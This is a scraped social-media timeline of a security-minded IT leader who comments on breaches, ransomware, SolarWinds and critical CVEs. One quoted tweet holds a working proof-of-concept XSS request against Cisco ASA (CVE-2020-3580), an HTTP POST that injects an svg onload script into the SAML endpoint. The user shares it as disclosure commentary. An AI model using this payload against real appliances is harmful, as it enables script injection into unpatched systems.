Zach Vinduska
196 posts

Zach Vinduska
@ZachDusk
Information Technology Leader and security fanatic. Posts are my own.
Dallas, TX Katılım Aralık 2014
251 Takip Edilen135 Takipçiler

So how bad will it be when plaid.com gets hacked. That financial data store will hurt. Stored banking credentials has to make it a target.
English

US Census Bureau hacked in January 2020 using Citrix exploit that was not patchable but had mitigating actions that failed to be done. bleepingcomputer.com/news/security/…
English

another day another #zeroday. #printnightmare #CyberSecurity Check in on your windows domain administrators, they are not okay today.
English

This will be interesting. We will see a spike on this now that it is public #CyberSecurity #ciso #Cisco #Vulnerability
PT SWARM@ptswarm
🎁PoC for XSS in Cisco ASA (CVE-2020-3580) POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1 Host: ciscoASA.local Content-Type: application/x-www-form-urlencoded Content-Length: 44 SAMLResponse="><svg/onload=alert('PTSwarm')>
English

credera.com/insights/shift… In a world of security talent that has no clue when it comes to DevSecOps its good to know there is a JW out there.
English

@jaimesbarton I hear you. I did not say Hacks, I said ransomware. The primary driver of these attacks in money. Always has been. Without the Ransom part, it will end. Hacking will never stop.
English

@ZachDusk i think that is far too short sighted, hacks were happening before. It needs to have another element than just to demonetize ransomware?
English

The only way we will see an end to #Ransomware attacks is to demonetize it. The efforts taken to deprive DarkSide of the money from the #ColonialPipeline hack has to be just the tip of the spear.
English
Zach Vinduska retweetledi

The DOJ has recovered the majority of the $4.4 million ransom Colonial Pipeline paid to the DarkSide hacking network in the wake of last month's cyberattack.
"Today, we turned the tables on DarkSide," said U.S. Deputy Attorney General Lisa Monaco trib.al/l0xguot
English

📌 Q: What are the steps in identity management?
A: Provisioning, review, revocation, deletion
v/ CCSP study guide
Cc: @Clarify360
#cloud #cybersecurity #cio #ciso
English

#vulnerability in @VMware product has severity rating of 9.8 out of 10 Get to pathing even if you are not externally exposed. #CyberSecurity #CISO
arstechnica.com/?post_type=pos…
English

Not security shaming here but I do love the use of “a limited number of files” exposed. Anything that is not unlimited is a limited amount. Sounds better than not everything was exposed, I guess. bleepingcomputer.com/news/security/…
English
Zach Vinduska retweetledi
Zach Vinduska retweetledi

A critical #vulnerability (CVE-2021-22986 / CVSS score: 9.8) affecting F5's BIG-IP and BIG-IQ products is UNDER ACTIVE ATTACKS after a PoC exploit was posted online.
Read details: thehackernews.com/2021/03/latest…
#infosec #cybersecurity #hacking #malware
English

@BradleyWCompton The best is to offer your product free for a period of time to bridge the gap created by SW issue. Then simply show your product is better and offer first year competitive price to cover partial expense of remaining SW license.
English

I've been a fan of the product for years but this is not a good look for #SolarWinds . As you can see from the list a lot of people were fans. Hopefully SolarWinds can see their way through this, but customers will want details or they will be gone.
John Basham@JohnBasham
CONTD: @SolarWinds’ Customers; -425+ of US Fortune 500 co's -All of top 10 US telecom co's -All 5 branches US Military -Pentagon -State Department -NASA -NSA -USPS -NOAA -DOJ -Office of POTUS -Top 5 US accounting firms -100's universities/colleges List: solarwinds.com/company/custom…
English




